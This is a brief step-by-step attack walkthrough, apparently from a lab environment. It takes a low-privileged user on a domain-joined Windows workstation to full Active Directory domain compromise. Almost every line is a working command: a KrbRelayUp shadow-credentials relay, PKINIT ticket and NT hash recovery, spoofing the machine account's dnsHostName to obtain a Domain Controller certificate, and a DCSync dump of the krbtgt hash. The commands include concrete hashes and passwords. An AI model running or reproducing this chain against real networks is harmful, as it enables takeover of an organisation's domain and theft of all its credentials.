This exploit path will only imply if you have an interactive session on a domain joined workstation regardless the privilege of the account (it could be a low privileged account)
- Obtain system certificate for the current workstation
KrbRelayUp.exe relay -m shadowcred -f
- Get the certificate and certificate password.
python3 gettgtpkinit.py 'range.net/ws01$' -pfx-base64 $(cat /tmp/ws01.b64) -pfx-pass 'yB3@sL1=fP3$' -dc-ip 192.168.86.182 /tmp/out.ccache
- Recover NTLM hash for the computer account
python3 getnthash.py -key 643962c82ed3db0207d9fb3c6bf094dbe2721e12a32e7798dbd220db165926d2 -dc-ip 192.168.86.182 'range.net/ws01$'
- Clearing SPN and modify the current computer account's dnsHostName identical to Domain Controller's with modify_computer.py
python3 modify_computer.py range.net/ws01\[email protected] -hashes :0e3ae07798e1bc9e02b049a795a7e69f
- Request certificate with certi. A Domain Controller's certificate should be retrieved!
python3 certi.py req range.net/ws01\[email protected] range-CA01-CA -k -n --dc-ip 192.168.86.182 -t Machine --hashes :0e3ae07798e1bc9e02b049a795a7e69f
- Authenticate with the DC's certificate
python3 gettgtpkinit.py 'range.net/dc01$' -pfx-base64 dc01\$.pfx -pfx-pass 'admin' -dc-ip 192.168.86.182 /tmp/out.ccache
- Recover NTLM hash for the DC
export KRB5CCNAME=/tmp/out.ccache
python3 getnthash.py 'range/dc01$' -key {sha1-key} -dc-ip 192.168.86.182
- DCSync and win
secretsdumpy.py range.net/dc01\[email protected] -hashes :{retrieve-ntlm-hash} -just-dc -just-dc-user 'range\krbtgt'
For steps that requires Windows Workstation, you can refer to this gist